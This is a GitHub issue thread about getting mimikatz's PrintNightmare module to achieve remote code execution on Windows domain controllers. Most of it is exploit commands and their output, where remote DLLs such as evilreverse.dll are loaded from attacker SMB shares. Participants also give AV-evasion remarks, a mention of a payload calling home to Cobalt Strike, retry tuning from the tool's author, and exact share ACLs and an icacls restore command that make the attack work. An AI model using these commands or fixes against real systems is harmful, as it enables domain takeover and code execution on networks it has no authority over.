mimikatz
mimikatz copied to clipboard
gentilkiwi
[ERROR] kuhl_m_misc_printnightmare_CallAddPrinterDriverEx
While trying to reproduce the printnightmare bug, I am coming across with an error condition. As per the wireshark packet traces, for the AddPrinterDriverEx DCERPC call I don't see any potential error (screenshot attached below) though.
Any idea, if I missing something here?
mimikatz exec:
mimikatz # misc::printnightmare /server:172.16.1.254 /library:\\172.16.1.40\share\calc.dll
| Remote : 172.16.1.254
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\unidrv.dll
| DataFile : \\172.16.1.40\share\calc.dll (calc.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 5
mimikatz #
Wireshark:
Hi @sujit , I've only played with this recently so I'm certainly no expert. However, I found the same behavior you described when my DLL payload was getting eaten by AV. I finally crafted one that did evade AV, and when that happens, the last line of output says:
ConfigFile: c:\some\path\name-of-your-DLL.dll - OK!
And then I found that my DLL executed and called home to my Cobalt Strike server.
I'm getting the same CallAddPrinterDriverEx error, against both 2016 and 2019 DCs, with both having their AV disabled.
Would love to hear if anyone has some insights or suggestions.
Thanks!
can you confirm that the serv can reach the share without credentials ?
FYI, I am able to access the anonymous share records from the DC box without any authentications in-place. However, this time I see another error, but pretty much similar (error code value changed this time) though:
Just curious, if at all someone has the PCAP (when the exploit actually worked), would anyone mind sharing the same? That could help me understand what might be going wrong under the hood.
mimikatz # misc::printnightmare /server:172.16.1.254 /library:\\172.16.1.15\smb\evilreverse.dll
| Remote : 172.16.1.254
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\unidrv.dll
| DataFile : \\172.16.1.15\smb\evilreverse.dll (evilreverse.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\evilreverse.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 3
mimikatz #
@Ug0Security ^^^
I have the same issue on a Windows 10 without AV in a VM, I checked the code a bit, and I think 1 condition here is probably the issue (the share folder is available without credentials):
https://github.com/gentilkiwi/mimikatz/blob/c21276072b3f2a47a21e215a46962a17d54b3760/mimikatz/modules/kuhl_m_misc.c#L1439
Btw I like spaghetti :p
the share folder is available without credentials
If you have this in your capture (between AddPrinterDriverEx request and response), this is because of a not anonymous accessible remote share
+, the "poc" is for fresh system without previous attempt, you can have better result by adding /try:50 by eg.
Example with previous attempt(s) of another POC
.#####. mimikatz 2.2.0 (x64) #19041 Jul 1 2021 03:17:37
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # misc::printnightmare /server:dc.lab.local /library:\\hack.lab.local\security\mimilib.dll /try:10
| Remote : dc.lab.local
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\unidrv.dll
| DataFile : \\hack.lab.local\security\mimilib.dll (mimilib.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
| Trying : 3 to 10
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\3\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\4\mimilib.dll - OK!
mimikatz(commandline) # exit
Bye!
Having the same problem with anonymous accessible share and vulnerable DC
I think https://github.com/cube0x0/CVE-2021-1675/pull/25 can solve the issue. Soletimes backup folder is cleanup properly, using this solution we can perform rce without bruteforcing the backup folder. It’s more stable.
So, i had this issue and have been trying to solve it for a few days. Im now able to reproduce the issue and consistently repair it. I dont know what causes this. However, every time i create a folder and share it, the ICACLS of it is not 100% identical to the one that originally worked. So by exporting ICACLS and comparing and then restoring the functional one to every other directory i tried, it works.
If it helps anyone else, feel free to try:
2 D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;OICIIOID;SDGXGWGR;;;AU)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU) 2\mimidrv.sys D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU) 2\mimikatz.exe D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU) 2\mimilib.dll D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU) 2\mimispool.dll D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
To restore it, go one step up in folder structure from \2\ and run: (in my case C:\SEC\2 would be C:\SEC) icacls C:\SEC /restore C:\SEC\rightsbackup.txt /t /c
